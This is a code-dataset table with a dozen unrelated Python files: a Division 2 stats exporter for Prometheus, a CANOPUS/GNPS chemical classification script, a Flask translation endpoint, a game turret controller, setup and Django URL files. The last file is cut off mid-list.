content stringlengths 5 1.05M |
|---|
class Command(object):
    """Minimal command base: subclasses override :meth:`execute`."""

    @classmethod
    def execute(cls):
        """No-op default implementation; returns ``None``."""
        return None
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import requests
import os
import time
from prometheus_client import Gauge
from prometheus_client import start_http_server
class D2():
    """The Division 2 API client fetching user info from thedivisiontab.com."""

    # JSON fields of the player endpoint that are reported in seconds and
    # converted to whole hours, in output order.
    _TIME_FIELDS = ('timeplayed_total', 'timeplayed_dz', 'timeplayed_pve',
                    'timeplayed_pvp', 'timeplayed_rogue')
    # Remaining JSON fields passed through unchanged, in output order.
    _STAT_FIELDS = ('level_pve', 'level_dz', 'kills_npc', 'kills_pvp',
                    'kills_pve_hyenas', 'kills_pve_outcasts',
                    'kills_pve_blacktusk', 'kills_pve_truesons',
                    'kills_pve_dz_hyenas', 'kills_pve_dz_outcasts',
                    'kills_pve_dz_blacktusk', 'kills_pve_dz_truesons',
                    'kills_headshot', 'headshots')

    def __init__(self, url):
        # API endpoint this client queries (search.php or player.php).
        self.url = url

    def get_user_id(self, uplay_name):
        """Return the uplay user id for *uplay_name*, or ``False`` on failure.

        Failure covers request errors, invalid JSON, a missing ``results``
        key, and an empty result list (the original code raised IndexError
        on the last case).
        """
        params = (
            ('name', uplay_name),
            ('platform', 'uplay'),
        )
        try:
            r = requests.get(self.url, params=params)
            data = r.json()  # parse the response once
        except Exception:
            return False
        results = data.get('results')
        if results:  # also guards against an empty results list
            return results[0]['user']
        return False

    def get_user_info(self, user_id):
        """Return a 19-tuple of play stats for *user_id*.

        Time fields come first (converted from seconds to whole hours),
        followed by level and kill counters. On any request/JSON failure a
        tuple of 19 ``False`` values is returned, matching the original
        contract.
        """
        params = (
            ('pid', user_id),
        )
        try:
            r = requests.get(self.url, params=params)
            data = r.json()  # parse once instead of once per field
        except Exception:
            return (False,) * 19
        times = tuple(int(data[field] / 3600) for field in self._TIME_FIELDS)
        stats = tuple(data[field] for field in self._STAT_FIELDS)
        return times + stats
def main():
    """Poll thedivisiontab API and expose player stats as Prometheus gauges.

    Creates one gauge per (user, metric) pair, serves them on port 8000,
    and refreshes every 60 seconds forever.
    """
    users = ['jedipigpig', 'gatchaman.jp', 'lobelia_dixon',
             'hayate_ewing', 'souyuh.jp']
    # Metric names in the exact order get_user_info() returns its values.
    metrics = ['timeplayed_total', 'timeplayed_dz',
               'timeplayed_pve', 'timeplayed_pvp',
               'timeplayed_rogue', 'level_pve',
               'level_dz', 'kills_npc',
               'kills_pvp', 'kills_pve_hyenas',
               'kills_pve_outcasts', 'kills_pve_blacktusk',
               'kills_pve_truesons', 'kills_pve_dz_hyenas',
               'kills_pve_dz_outcasts', 'kills_pve_dz_blacktusk',
               'kills_pve_dz_truesons', 'kills_headshot',
               'headshots']
    gauges = {}  # renamed from `dict`/`vars` to avoid shadowing builtins
    for user in users:
        for metric in metrics:
            # Prometheus metric names may not contain '.', hence replace().
            gauges[user + '_' + metric] = \
                Gauge(user.replace('.', '_') + '_' + metric, 'Gauge')
    start_http_server(8000)
    while True:
        for user in users:
            user_id = D2('https://thedivisiontab.com/api/search.php').get_user_id(user)
            if not user_id:
                continue  # skip the stats request when the lookup failed
            values = D2('https://thedivisiontab.com/api/player.php').get_user_info(user_id)
            # `metrics` and the returned tuple share the same ordering, so a
            # single zip replaces rebuilding a 19-entry dict per metric.
            for metric, value in zip(metrics, values):
                gauges[user + '_' + metric].set(value)
        time.sleep(60)


if __name__ == "__main__":
    main()
|
from common.utils import datetime_to_string
class Verification:
    """A verification request plus its API-response serialization."""

    def __init__(self, id, type, entity_id, status, requestee, created_at,
                 updated_at, reject_reason=None):
        self.id = id
        self.type = type
        self.entity_id = entity_id
        self.status = status
        self.requestee = requestee
        self.created_at = created_at
        self.updated_at = updated_at
        # Normalise a missing rejection reason to the empty string.
        self.reject_reason = "" if reject_reason is None else reject_reason

    def to_response(self):
        """Build the response dict; unset timestamps serialize as ""."""
        created = "" if self.created_at is None \
            else datetime_to_string(self.created_at)
        updated = "" if self.updated_at is None \
            else datetime_to_string(self.updated_at)
        return {
            "id": self.id,
            "type": self.type,
            "entity_id": self.entity_id,
            "status": self.status,
            "requestee": self.requestee,
            "reject_reason": self.reject_reason,
            "created_at": created,
            "updated_at": updated,
        }
|
from profanity_check import predict, predict_prob
from directoryLoader import directoryFileListBuilder
from fileAnalyzer import fileAnalyzer
'''
Dev: Alexander Edward Andrews
Email: alexander.e.andrews.ce@gmail.com
'''
def main():
    """Build the directory tree, then analyze every file found in it."""
    root_node = directoryFileListBuilder()
    recursiveCaller(root_node)
def recursiveCaller(fileNode):
    """Depth-first walk: analyze this node's files, then recurse subdirs."""
    for current_file in fileNode.files:
        fileAnalyzer(current_file)
    for subdirectory in fileNode.directories:
        recursiveCaller(subdirectory)
main()
|
#!/usr/bin/env python3
import os
import canopus
import time
from sys import argv
from collections import defaultdict
from typing import List, Dict, Tuple, Union, DefaultDict, Any
def analyse_canopus(sirius_folder: str,
                    gnps_folder: str,
                    output_folder: str = './',
                    class_p_cutoff: float = 0.5,
                    max_class_depth: Union[float, None] = None,
                    mf_fraction_cutoff_cf: float = 0.2,
                    mf_fraction_cutoff_npc: float = 0.2):
    """Wrapper for analysing and combining canopus output with gnps mol network

    :param sirius_folder: directory containing sirius/canopus output
    :param gnps_folder: directory containing gnps molecular networking output
    :param output_folder: directory to write (preliminary) output to
    :param class_p_cutoff: cutoff for CF class prediction to be taken into
        account
    :param max_class_depth: setting to control which CF classes are taken into
        account. Setting this to None will use all classes at all levels
        (default). Setting to a number will only keep classes at the Xth level.
        These classes are then traced back to their parents.
    :param mf_fraction_cutoff_cf: fraction cutoff for CF classes to be called
        in a componentindex (MF). 0.2 means classes are kept if it occurs in
        20% of the spectra
    :param mf_fraction_cutoff_npc: fraction cutoff for NPC classes to be called
        in a componentindex (MF). 0.2 means classes are kept if it occurs in
        20% of the spectra
    :return: None

    Creates two txt files as output: one for the clusterindices and one for the
    componentindices (MFs). Classes for each level are sorted by (our vision
    of) most important classes, so taking the first class for a level will be
    taking the most important class into account, taking the first two classes
    will take the two most important classes into account, etc. For CF classes,
    they are sorted by priority (see class_priority.txt), and for NPC classes,
    they are sorted by highest score.
    """
    # make canopus object
    can = canopus.Canopus(sirius_folder, gnps_folder)
    # CF hierarchy: the four named levels plus numbered deeper levels
    hierarchy = ["kingdom", "superclass", "class", "subclass"] + \
                [f"level {i}" for i in range(5, 12)]
    npc_hierarchy = ['pathway', 'superclass', 'class']
    # find classes per cluster index (spectrum) by looping through the nodes
    # in the molecular network
    class_results = get_classes_for_mol_network(
        can, hierarchy, npc_hierarchy, class_p_cutoff, max_class_depth)
    # write cluster index (spectra) results
    write_classes_cluster_index(class_results, hierarchy, npc_hierarchy,
                                output_folder)
    # group classes per componentindex (molecular family)
    comp_ind_classes = get_classes_for_componentindices(
        class_results, can, hierarchy, npc_hierarchy, mf_fraction_cutoff_cf,
        mf_fraction_cutoff_npc)
    # write componentindex results (the writer's return value is unused here)
    write_classes_componentindex(
        comp_ind_classes, hierarchy, npc_hierarchy, output_folder)
def get_classes_for_mol_network(can: canopus.Canopus,
                                hierarchy: List[str],
                                npc_hierarchy: List[str],
                                class_p_cutoff: float,
                                max_class_depth: Union[int, None]) -> \
        DefaultDict[str, List[Union[str, Dict[str, List[Tuple[
            Union[str, float]]]]]]]:
    """Loop through mol network and gather CF and NPC classes

    :param can: Canopus object of canopus results with gnps mol network data
    :param hierarchy: the CF class level names to be included in output in
        order of hierarchy
    :param npc_hierarchy: the NPC class level names to be included in output in
        order of hierarchy
    :param class_p_cutoff: probability cutoff for including a class
    :param max_class_depth: max class depth for finding CF class
    :return: classes output - dict of lists of {componentindex: [cluster index,
        formula, {CF_level: [(class, prob)]}, {NPC_level: [(class, prob)]}]}
    """
    grouped = defaultdict(list)
    for node_id, node in can.gnps.nodes.items():
        compound = can.sirius.compounds.get(node_id)
        if not compound:
            continue  # no canopus prediction for this spectrum
        cf_classes = get_cf_classes(can, compound, hierarchy,
                                    class_p_cutoff, max_class_depth)
        npc_classes = get_npc_classes(can, compound, npc_hierarchy)
        component_id = node.componentId
        if component_id == '-1':
            # singletons all share componentindex -1; suffix the node id
            # so each singleton gets its own group
            component_id += f"_{node_id}"
        grouped[component_id].append(
            [node_id, compound.formula, cf_classes, npc_classes])
    return grouped
def get_cf_classes(can: canopus.Canopus,
                   compound: canopus.ontology.Category,
                   hierarchy: List[str],
                   class_p_cutoff: float = 0.5,
                   max_class_depth: Union[int, None] = None
                   ) -> Dict[str, List[Tuple[Any, Any]]]:
    """Get the ClassyFire classes for a compound

    :param can: Canopus object of canopus results with gnps mol network data
    :param compound: object for the current compound
    :param hierarchy: the CF class level names to be included in output in
        order of hierarchy
    :param class_p_cutoff: probability cutoff for including a class
    :param max_class_depth: None for using all classes, set this to a number
        for only taking classes into account at a certain max depth
    :return: dict with hierarchy as keys and list of tuples as values where
        each tuple contains a class (ontology.Category) and its score. List of
        classes is sorted on priority

    Finds all classes above the cutoff, orders them on priority, then fills
    the per-level result lists by tracing each chosen class back to all of
    its parents, highest-priority class first. Optionally only the class(es)
    at the deepest depth (capped by max_class_depth) are considered before
    the priority ordering.
    """
    # 1. all classification trees above the probability cutoff
    # (list() instead of an identity comprehension)
    classifications = list(can.sirius.statistics.categoriesFor(
        compound, class_p_cutoff))
    # 2.a. take all classifications above cutoff
    if not max_class_depth:
        deepest_classifications = classifications
    else:
        # 2.b. take deepest classification - find the most specific classes
        # classyFireGenus() gives a dict of the class trees
        max_tree = max(len(c.classyFireGenus()) for c in classifications)
        max_tree = min(max_tree, max_class_depth)
        deepest_classifications = [c for c in classifications if
                                   len(c.classyFireGenus()) >= max_tree]
    deepest_names = set(c.name for c in deepest_classifications)
    # 3. choose the most specific class with top priority
    priority_names = [c.name for c in can.sirius.statistics.priority]
    chosen_classes_sorted = []
    for pr in priority_names:  # find deepest with highest priority
        if pr in deepest_names:
            chosen_class = [c for c in deepest_classifications
                            if c.name == pr][0]
            chosen_classes_sorted.append(chosen_class)
    # 4. unpack/trace back all classes to parents even if parents have low prob
    classes_dict = defaultdict(list)
    classes_set_dict = defaultdict(set)  # per-level dedup of parent classes
    for c in chosen_classes_sorted:
        for h_lvl in hierarchy:
            c_h_lvl = c.classyFireGenus().get(h_lvl)
            if c_h_lvl:
                c_h_set = classes_set_dict[h_lvl]
                if c_h_lvl not in c_h_set:
                    classes_dict[h_lvl].append(c_h_lvl)
                    c_h_set.add(c_h_lvl)
    # 5. get all scores to tuple(cls, sc) and fill empty levels with empty list
    classes_dict_sc = {}
    for h_lvl in hierarchy:
        h_lvl_result = []
        for h_lvl_class in classes_dict[h_lvl]:
            # look up the canopus fingerprint probability for this class
            sc = compound.canopusfp[
                can.sirius.statistics.workspace.revmap[h_lvl_class]]
            h_lvl_result.append((h_lvl_class, sc))
        # classes_dict is a defaultdict, so levels without classes yield []
        classes_dict_sc[h_lvl] = h_lvl_result
    return classes_dict_sc
def get_npc_classes(can: canopus.Canopus,
                    compound: canopus.ontology.Category,
                    npc_hierarchy: List[str]):
    """Get NPClassifier classes for a compound

    :param can: Canopus object of canopus results with gnps mol network data
    :param compound: object for the current compound
    :param npc_hierarchy: the NPC class level names to be included in output in
        order of hierarchy
    :return: dict of {level: [(class, probability)]}; the list is empty for
        levels where the prediction is "N/A"
    """
    summary_row = can.npcSummary().loc[compound.name]
    npc_result = {}
    for level in npc_hierarchy:
        predictions = []
        predicted_class = summary_row[level]
        if predicted_class != "N/A":  # only record an actual prediction
            predictions.append(
                (predicted_class, summary_row[level + 'Probability']))
        npc_result[level] = predictions
    return npc_result
def write_classes_cluster_index(results: DefaultDict[str, List[
        Union[str, Dict[str, List[Tuple[Union[str, float]]]]]]],
                                hierarchy: List[str],
                                npc_hierarchy: List[str],
                                output_folder: str = './'):
    """Write class results for each cluster index to file grouped by components

    :param results: dict of lists of {componentindex: [cluster index,
        formula, {CF_level: [(class, prob)]}, {NPC_level: [(class, prob)]}]}
    :param hierarchy: the CF class level names to be included in output in
        order of hierarchy
    :param npc_hierarchy: the NPC class level names to be included in output in
        order of hierarchy
    :param output_folder: directory to write (preliminary) output to
    :return: None
    """
    def format_levels(class_dict, level_names):
        # one "class:prob; class:prob" column per hierarchy level
        columns = []
        for level in level_names:
            cells = [f"{cls}:{prob:.3f}" for cls, prob in class_dict[level]]
            columns.append('; '.join(cells))
        return columns

    output_file = os.path.join(output_folder,
                               "cluster_index_classifications.txt")
    header = ["componentindex", "cluster index", "formula"] + hierarchy + \
        npc_hierarchy
    with open(output_file, 'w') as outf:
        outf.write("{}\n".format('\t'.join(header)))
        # componentindices sort numerically; '-1_<node>' singletons key on -1
        ordered_components = sorted(
            results.items(), key=lambda item: int(item[0].split("_")[0]))
        for comp_ind, cluster_results in ordered_components:
            for cluster_res in sorted(cluster_results,
                                      key=lambda res: int(res[0])):
                row = [comp_ind, cluster_res[0], cluster_res[1]] \
                    + format_levels(cluster_res[2], hierarchy) \
                    + format_levels(cluster_res[3], npc_hierarchy)
                outf.write("{}\n".format('\t'.join(row)))
def get_classes_for_componentindices(clusterindex_results: DefaultDict[
        str, List[Union[str, Dict[str, List[Tuple[Union[str, float]]]]]]],
                                     can: canopus.Canopus,
                                     hierarchy: List[str],
                                     npc_hierarchy: List[str],
                                     cf_fraction_cutoff: float = 0.3,
                                     npc_fraction_cutoff: float = 0.2) -> \
        List[Tuple[str, int, DefaultDict[Any, list], DefaultDict[Any, list]]]:
    """For each component index in clusterindex_results, gather classes

    :param clusterindex_results: classes output - defaultdict of lists of
        {componentindex: [cluster index, formula, {CF_level: [(class, prob)]},
        {NPC_level: [(class, prob)]}]}
    :param can: Canopus object of canopus results with gnps mol network data
    :param hierarchy: the CF class level names to be included in output in
        order of hierarchy
    :param npc_hierarchy: the NPC class level names to be included in output in
        order of hierarchy
    :param cf_fraction_cutoff: fraction cutoff for CF classes
    :param npc_fraction_cutoff: fraction cutoff for NPC classes
    :return: list with each tuple element being results for one componentindex
        (MF): (MF_name, MF_size, CF_results, NPC_results), where CF/NPC
        results are defaultdicts of {hierarchy_lvl: [(class, fraction_score)]}
    """
    collected = []
    for comp_ind, cluster_results in clusterindex_results.items():
        mf_size = len(cluster_results)  # number of spectra in this MF
        cf_shared = get_cf_classes_for_componentindex(
            cluster_results, mf_size, can, hierarchy, cf_fraction_cutoff)
        npc_shared = get_npc_classes_for_componentindex(
            cluster_results, mf_size, npc_hierarchy, npc_fraction_cutoff)
        collected.append((comp_ind, mf_size, cf_shared, npc_shared))
    return collected
def get_cf_classes_for_componentindex(cluster_ind_results: List[
        Union[str, Dict[str, List[Tuple[Union[str, float]]]]]],
                                      num_cluster_inds: int,
                                      can: canopus.Canopus,
                                      hierarchy: List[str],
                                      fraction_cutoff: float = 0.3) -> \
        DefaultDict[str, List[Tuple[Any]]]:
    """
    For one componentindex compute shared CF classes from clusterindex results

    :param cluster_ind_results: list of the cluster index results for one
        component index(MF) [cluster index, formula,
        {CF_level: [(class, prob)]}, {NPC_level: [(class, prob)]}]
    :param num_cluster_inds: size of the MF
    :param can: Canopus object of canopus results with gnps mol network data
    :param hierarchy: the CF class level names to be included in output in
        order of hierarchy
    :param fraction_cutoff: fraction cutoff for CF classes
    :return: defaultdict with {hierarchy_lvl: [(class, fraction_score)] }
    """
    comp_ind_scores = {}  # dict{class: fraction_score}
    # 1. count the instances of each class in the componentindex (MF)
    # NOTE(review): the counter keys are the class objects taken from the
    # (class, prob) tuples (canopus ontology.Category, per get_cf_classes) -
    # confirm they hash/compare consistently across spectra
    h_counters = {h: defaultdict(int) for h in hierarchy}
    for cluster_ind_res in cluster_ind_results:
        ci_classes = cluster_ind_res[2]  # CF classes dict for one spectrum
        for h in hierarchy:
            for class_tup in ci_classes[h]:
                c_name = class_tup[0]
                if c_name:
                    h_counters[h][c_name] += 1
    # 2. calculate fraction and save to dict, regardless of hierarchy lvl
    for h_lvl, h_dict in h_counters.items():
        for cls, count in h_dict.items():
            if cls:
                frac = count / num_cluster_inds
                if frac >= fraction_cutoff:
                    comp_ind_scores[cls] = frac
    # 3. order all classes on priority (most important classes first)
    priority_classes = [c for c in can.sirius.statistics.priority]
    comp_ind_sorted_pr = []
    for pr in priority_classes:  # highest priority
        if pr in comp_ind_scores:
            comp_ind_sorted_pr.append(pr)
    # 4. fill hierarchy based on priority: trace each kept class back to its
    # parents via classyFireGenus(), so parents inherit the priority order
    comp_ind_classes_dict = defaultdict(list)
    comp_ind_classes_set_dict = defaultdict(set)
    for c in comp_ind_sorted_pr:
        for h_lvl in hierarchy:
            c_h_lvl = c.classyFireGenus().get(h_lvl)
            if c_h_lvl:
                c_h_set = comp_ind_classes_set_dict[h_lvl]
                # make sure to add a classification only once to lvl
                if c_h_lvl not in c_h_set:
                    # NOTE(review): assumes every traced parent class also
                    # passed the fraction cutoff; a parent missing from
                    # comp_ind_scores would raise KeyError - confirm
                    comp_ind_sc = comp_ind_scores[c_h_lvl]
                    comp_ind_classes_dict[h_lvl].append(
                        (c_h_lvl, comp_ind_sc))
                    c_h_set.add(c_h_lvl)
    return comp_ind_classes_dict
def get_npc_classes_for_componentindex(cluster_ind_results: List[
        Union[str, Dict[str, List[Tuple[Union[str, float]]]]]],
                                       num_cluster_inds: int,
                                       npc_hierarchy: List[str],
                                       fraction_cutoff: float = 0.2) -> \
        DefaultDict[str, List[Tuple[Any]]]:
    """
    Compute the NPC classes shared within one componentindex (MF)

    :param cluster_ind_results: list of the cluster index results for one
        component index(MF) [cluster index, formula,
        {CF_level: [(class, prob)]}, {NPC_level: [(class, prob)]}]
    :param num_cluster_inds: size of the MF
    :param npc_hierarchy: the NPC class level names to be included in output in
        order of hierarchy
    :param fraction_cutoff: minimum fraction of the MF's spectra a class must
        occur in to be kept
    :return: defaultdict with {hierarchy_lvl: [(class, fraction_score)] }
    """
    # Tally how often each class occurs at each level across the MF's spectra.
    occurrence = {level: defaultdict(int) for level in npc_hierarchy}
    for cluster_res in cluster_ind_results:
        npc_levels = cluster_res[3]  # NPC classes dict for one spectrum
        for level in npc_hierarchy:
            for class_tup in npc_levels[level]:
                cls_name = class_tup[0]
                if cls_name:
                    occurrence[level][cls_name] += 1
    # Keep classes above the fraction cutoff, most frequent first per level.
    shared = defaultdict(list)
    for level, counts in occurrence.items():
        ranked = sorted(counts.items(), key=lambda kv: kv[1], reverse=True)
        for cls_name, count in ranked:
            if cls_name:
                fraction = count / num_cluster_inds
                if fraction >= fraction_cutoff:
                    shared[level].append((cls_name, fraction))
    return shared
def write_classes_componentindex(comp_ind_cf_classes: List[
        Tuple[str, int, DefaultDict[Any, list], DefaultDict[Any, list]]],
                                 hierarchy: List[str],
                                 npc_hierarchy: List[str],
                                 output_folder: str):
    """
    Write component indices class results - component_index_classifications.txt

    :param comp_ind_cf_classes: per-MF tuples of
        (MF_name, MF_size, CF_results, NPC_results)
    :param hierarchy: the CF class level names to be included in output in
        order of hierarchy
    :param npc_hierarchy: the NPC class level names to be included in output in
        order of hierarchy
    :param output_folder: directory to write (preliminary) output to
    :return: path of output file
    """
    def level_columns(class_dict, level_names):
        # one "class:score; class:score" cell per hierarchy level
        cells = []
        for level in level_names:
            cells.append('; '.join(
                f"{cls}:{score:.3f}" for cls, score in class_dict[level]))
        return cells

    output_file = os.path.join(output_folder,
                               "component_index_classifications.txt")
    header = ["componentindex", "size"] + hierarchy + npc_hierarchy
    # componentindices sort numerically; '-1_<node>' singletons key on -1
    ordered = sorted(comp_ind_cf_classes,
                     key=lambda entry: int(entry[0].split("_")[0]))
    with open(output_file, 'w') as outf:
        outf.write("{}\n".format('\t'.join(header)))
        for comp_ind, mf_size, cf_res, npc_res in ordered:
            row = [comp_ind, str(mf_size)] \
                + level_columns(cf_res, hierarchy) \
                + level_columns(npc_res, npc_hierarchy)
            outf.write("{}\n".format('\t'.join(row)))
    return output_file
if __name__ == "__main__":
    start = time.time()
    print("Start")
    # CLI: classification_to_gnps.py sirius_folder gnps_folder [output_folder]
    if len(argv) < 3:
        # A bad argument count is a usage error, not a missing file:
        # SystemExit prints the usage message without a traceback, where
        # FileNotFoundError (used previously) dumped an unrelated traceback.
        raise SystemExit(
            "\nUsage: python classification_to_gnps.py " +
            "sirius_folder gnps_folder output_folder(default: ./)")
    sirius_file = argv[1]
    gnps_file = argv[2]
    output_dir = argv[3] if len(argv) == 4 else './'
    analyse_canopus(sirius_file, gnps_file, output_dir)
    end = time.time()
    print(f"\nTime elapsed: {end - start:.2f}s")
|
# Importing essential libraries
from flask import Flask, render_template, request
from googletrans import Translator
# Module-level translator client and Flask app shared by all requests.
translator=Translator()
app = Flask(__name__)
@app.route('/predict')
def predict():
    """Translate the 'message' query param from English into 'languages'.

    Returns the translated text, or a plain error string when the target
    language is missing or unsupported (previously an unknown language
    crashed with UnboundLocalError on dest_code).
    """
    # Language name (lower-cased) -> googletrans destination code.
    # Replaces a 70-branch if-chain; also fixes two wrong codes:
    #   danish was 'ta' (tamil) by copy-paste mistake -> 'da'
    #   chinese(simplified) was 'zh-ch' (invalid) -> 'zh-cn'
    lang_codes = {
        'kannada': 'kn', 'japanese': 'ja', 'hindi': 'hi', 'telugu': 'te',
        'tamil': 'ta', 'afrikaans': 'af', 'albanian': 'sq', 'arabic': 'ar',
        'amharic': 'am', 'azerbaijani': 'az', 'bengali': 'bn',
        'bulgarian': 'bg', 'catalan': 'ca', 'chichewa': 'ny',
        'chinese(simplified)': 'zh-cn', 'chinese(traditional)': 'zh-tw',
        'corsican': 'co', 'croatian': 'hr', 'czech': 'cs', 'danish': 'da',
        'dutch': 'nl', 'esperanto': 'eo', 'finnish': 'fi', 'french': 'fr',
        'galician': 'gl', 'georgian': 'ka', 'german': 'de', 'greek': 'el',
        'gujrati': 'gu', 'hausa': 'ha', 'hawaiin': 'haw', 'hebrew': 'iw',
        'hmong': 'hmn', 'indonesian': 'id', 'italian': 'it', 'kazakh': 'kk',
        'lao': 'lo', 'latin': 'la', 'lithuanian': 'lt', 'luxembourgish': 'lb',
        'malagasy': 'mg', 'malayalam': 'ml', 'marathi': 'mr',
        'mongolian': 'mn', 'myanmar': 'my', 'nepali': 'ne', 'norwegian': 'no',
        'odia': 'or', 'persian': 'fa', 'polish': 'pl', 'portuguese': 'pt',
        'punjabi': 'pa', 'romanian': 'ro', 'russian': 'ru', 'serbian': 'sr',
        'sindhi': 'sd', 'slovak': 'sk', 'somali': 'so', 'spanish': 'es',
        'swahili': 'sw', 'swedish': 'sv', 'thai': 'th', 'turkish': 'tr',
        'urdu': 'ur', 'uzbek': 'uz', 'vietnamese': 'vi', 'yiddish': 'yi',
        'zulu': 'zu',
    }
    message = request.args.get('message')
    lang = request.args.get('languages')
    if not lang:
        # previously a missing param crashed with AttributeError on .lower()
        return "No target language supplied"
    dest_code = lang_codes.get(lang.lower())
    if dest_code is None:
        return f"Unsupported language: {lang}"
    text_to_translate = translator.translate(message, src='en',
                                             dest=dest_code)
    return text_to_translate.text
if __name__ == '__main__':
    # NOTE(review): debug=True enables the Werkzeug debugger/reloader;
    # it must be disabled for any non-development deployment.
    app.run(debug=True)
"""Top-level package for Deployer of AWS Lambdas."""
__author__ = """Sean Lynch"""
__email__ = 'seanl@literati.org'
__version__ = '0.2.1'
|
import math
from controller import Controller
from math_helpers import PolarCoordinate, RelativeObjects, normalise_angle
class TurretController(Controller):
    """Controller that aims the turret at the rocket and decides when to fire."""

    def calc_inputs(self):
        """Return (rotation_velocity, fire_flag) for the current timestep.

        Fires only when firing is allowed and the projectile is predicted to
        hit the rocket inside the play area and before hitting any obstacle.
        """
        if not self.helpers.can_turret_fire():
            return self.calc_rotation_velocity(), False
        if (
            self.will_projectile_hit_rocket_within_bounds()
            and self.will_projectile_hit_rocket_before_obstacle()
        ):
            return self.calc_rotation_velocity(), True
        return self.calc_rotation_velocity(), False

    def calc_rotation_velocity(self):
        """Signed rotation speed stepping the turret toward the firing angle."""
        firing_angle = self.controller_helpers.firing_angle2hit_rocket()
        angle2rocket = self.calc_angle2rocket()
        # Fall back to pointing straight at the rocket when no firing
        # solution exists or the solution is more than 90 deg away from it.
        if firing_angle is None or abs(firing_angle - angle2rocket) > math.pi / 2:
            firing_angle = (
                angle2rocket  # If firing angle is at > 90 deg, aim for the rocket
            )
        delta_angle = normalise_angle(firing_angle - self.history.turret.angle)
        abs_rotation_speed = min(
            self.parameters.turret.max_rotation_speed,
            abs(delta_angle) / self.parameters.time.timestep,
        )  # Take a smaller step if a full move would carry past the rocket
        return (1 if delta_angle >= 0 else -1) * abs_rotation_speed

    def will_projectile_hit_rocket_within_bounds(self):
        """True if a shot fired now would pass close enough to the rocket,
        with both projectile and rocket still inside the play area at the
        moment of closest approach.
        """
        # Require closest approach well inside the target radius (factor 2).
        safety_buffer = 2.0
        projectile_location = self.parameters.turret.location
        projectile_speed = self.parameters.turret.projectile_speed
        projectile_angle = self.history.turret.angle
        # Projectile modelled as launched now at the turret's current angle.
        projectile_velocity = PolarCoordinate(
            projectile_speed, projectile_angle
        ).pol2cart()
        rocket_location = self.history.rocket.location
        rocket_velocity = self.physics.calc_rocket_velocity()
        projectile2rocket = RelativeObjects(
            projectile_location, rocket_location, projectile_velocity, rocket_velocity
        )
        (
            min_dist,
            _,
            (projectile_location_min_dist, rocket_location_min_dist),
        ) = projectile2rocket.minimum_distance_between_objects()
        return (
            min_dist <= self.parameters.rocket.target_radius / safety_buffer
            and self.helpers.is_within_bounds(projectile_location_min_dist)
            and self.helpers.is_within_bounds(rocket_location_min_dist)
        )

    def will_projectile_hit_rocket_before_obstacle(self):
        """True if the shot reaches the rocket before entering any obstacle."""
        projectile_location = self.parameters.turret.location
        projectile_speed = self.parameters.turret.projectile_speed
        projectile_angle = self.history.turret.angle
        projectile_velocity = PolarCoordinate(
            projectile_speed, projectile_angle
        ).pol2cart()
        rocket_location = self.history.rocket.location
        rocket_velocity = self.physics.calc_rocket_velocity()
        projectile2rocket = RelativeObjects(
            projectile_location, rocket_location, projectile_velocity, rocket_velocity
        )
        rocket_output = projectile2rocket.time_objects_first_within_distance(
            self.parameters.rocket.target_radius
        )
        if rocket_output is None:
            return False  # Doesn't hit rocket at all
        time_rocket_intercept, _ = rocket_output
        # Obstacles are treated as stationary (no velocity argument passed).
        for obstacle in self.parameters.environment.obstacles:
            projectile2obstacle = RelativeObjects(
                projectile_location, obstacle.location, projectile_velocity
            )
            obstacle_output = projectile2obstacle.time_objects_first_within_distance(
                obstacle.radius
            )
            if obstacle_output is None:
                continue
            time_obstacle_intercept, _ = obstacle_output
            if time_obstacle_intercept < time_rocket_intercept:
                return False
        return True

    def calc_angle2rocket(self):
        """Absolute angle from the turret to the rocket.

        The location difference iterates as (x, y); reversing it yields the
        (y, x) argument order that math.atan2 expects.
        """
        return math.atan2(
            *(
                list(self.history.rocket.location - self.parameters.turret.location)[
                    ::-1
                ]
            )
        )
|
from src.run import hello_world
def test_hello():
    """The greeting helper returns the canonical hello-world string."""
    expected = "Hello world!"
    assert hello_world() == expected
|
from setuptools import setup
from setuptools import find_packages
# Long description shown on the package index page.
long_description = '''
Implementation of a sharable vector-like structure.
'''

# Distribution metadata; numpy is the only runtime dependency, the test
# extras install via `pip install PyVector[tests]`.
setup(name='PyVector',
      version='0.0.1',
      description='',
      long_description=long_description,
      author='Frédéric Branchaud-Charron',
      author_email='frederic.branchaud.charron@gmail.com',
      url='https://github.com/Dref360/pyvector-shared',
      license='MIT',
      install_requires=['numpy>=1.9.1'],
      extras_require={
          'tests': ['pytest',
                    'pytest-pep8',
                    'pytest-xdist'],
      },
      classifiers=[
          'Intended Audience :: Developers',
          'Intended Audience :: Education',
          'Intended Audience :: Science/Research',
          'License :: OSI Approved :: MIT License',
          'Programming Language :: Python :: 3',
          'Programming Language :: Python :: 3.6',
          'Topic :: Software Development :: Libraries',
          'Topic :: Software Development :: Libraries :: Python Modules'
      ],
      packages=find_packages())
|
from django.urls import path
from rest_framework.urlpatterns import format_suffix_patterns
from modem_api import views
# REST endpoints: a list view and a pk-keyed detail view per resource.
urlpatterns = [
    path('modems/', views.ModemList.as_view(), name='modem-list'),
    path('modems/<int:pk>/', views.ModemDetail.as_view(), name='modem-detail'),
    path('stations/', views.StationList.as_view(), name='station-list'),
    path('stations/<int:pk>/', views.StationDetail.as_view(), name='station-detail'),
    path('service_stations/', views.ServiceStationList.as_view(), name='service-station-list'),
    path('service_stations/<int:pk>/', views.ServiceStationDetail.as_view(), name='service-station-detail'),
    path('users/', views.UserList.as_view(), name='user-list'),
    path('users/<int:pk>/', views.UserDetail.as_view(), name='user-detail'),
]
# Allow optional format suffixes (e.g. .json, .api) on every route above.
urlpatterns = format_suffix_patterns(urlpatterns)
|
import pandas as pd
import matplotlib.pyplot as plt
# Load Intel price history indexed by trading date.
stock_price = pd.read_csv('datasets/intel.csv', parse_dates=True, index_col='Date')

# Plot Open/Close for one trading week, each series on its own subplot.
week_prices = stock_price.loc['2017-10-16':'2017-10-20', ['Open', 'Close']]
week_prices.plot(style='.-', title='Intel Stock Price', subplots=True)
plt.ylabel('Closing Price')
plt.show()
from django.urls import path
from django.conf import settings
from django.conf.urls.static import static
from . import views
# Track-editor endpoints: segment manipulation, session management and
# track/summary queries.  Most routes address a segment by its index.
urlpatterns = [
    # The same view serves the editor with and without a selected segment
    # index; both routes intentionally share the 'editor' name.
    path('', views.editor, name='editor'),
    path('<int:index>', views.editor, name='editor'),
    path('rename_segment/<int:index>/<str:new_name>', views.rename_segment,
         name='rename_segment'),
    path('remove_segment/<int:index>', views.remove_segment, name='remove_segment'),
    path('get_segment/<int:index>', views.get_segment, name='get_segment'),
    path('get_track', views.get_track, name='get_track'),
